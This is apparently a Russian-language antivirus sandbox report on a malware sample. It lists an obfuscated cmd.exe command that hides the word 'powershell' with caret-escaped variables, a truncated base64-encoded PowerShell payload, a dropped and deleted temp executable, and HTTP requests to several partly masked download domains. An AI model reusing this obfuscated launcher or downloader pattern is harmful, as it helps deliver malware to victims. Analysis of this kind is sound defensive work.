Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V /C "set %ZwbcnJjKZ%=vsMpiMPTp&&set %KzqniMwXn%=p^o^we^rs&&set %llCVIzXmA%=zLqAdswBa&&set %twibjVbZA%=he^ll&&set %YvUQokvkl%=cWrdSosLF&&!%KzqniMwXn%!!%twibjVbZA%! ^-^e LgAgACgAIAAkAEUAbgBWADo...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\54555.exe
Удаляет следующие файлы
- %TEMP%\54555.exe
Сетевая активность
Подключается к
- 'pu####odukties.nl':80
- 'br###e-loehr.de':80
- 'br###e-loehr.de':443
- 'bj#.de':80
- 'vi####am-gmbh.de':80
- 'wl##i.net':80
TCP
Запросы HTTP GET
- http://pu####odukties.nl/RMauWGgE/
- http://br###e-loehr.de/mkFRFHF/
- http://bj#.de/sUku/
- http://vi####am-gmbh.de/esohmhCZa/
- http://wl##i.net/NvoHkFXZe/
Другие
- 'br###e-loehr.de':443
UDP
- DNS ASK pu####odukties.nl
- DNS ASK br###e-loehr.de
- DNS ASK bj#.de
- DNS ASK vi####am-gmbh.de
- DNS ASK wl##i.net
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V /C "set %ZwbcnJjKZ%=vsMpiMPTp&&set %KzqniMwXn%=p^o^we^rs&&set %llCVIzXmA%=zLqAdswBa&&set %twibjVbZA%=he^ll&&set %YvUQokvkl%=cWrdSosLF&&!%KzqniMwXn%!!%twibjVbZA%! ^-^e LgAgACgAIAAkAEUAbgBWADo...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAgACgAIAAkAEUAbgBWADoAUABVAGIAbABpAEMAWwAxADMAXQArACQAZQBuAHYAOgBQAFUAQgBMAEkAQwBbADUAXQArACcAWAAnACkAIAAoACAAIgAkACgAUwBFAHQALQBJAFQAZQBtACAAJwB2AGEAUgBpAEEAQgBsAEUAOgBPAEYAUwAnACAAJwAnAC...
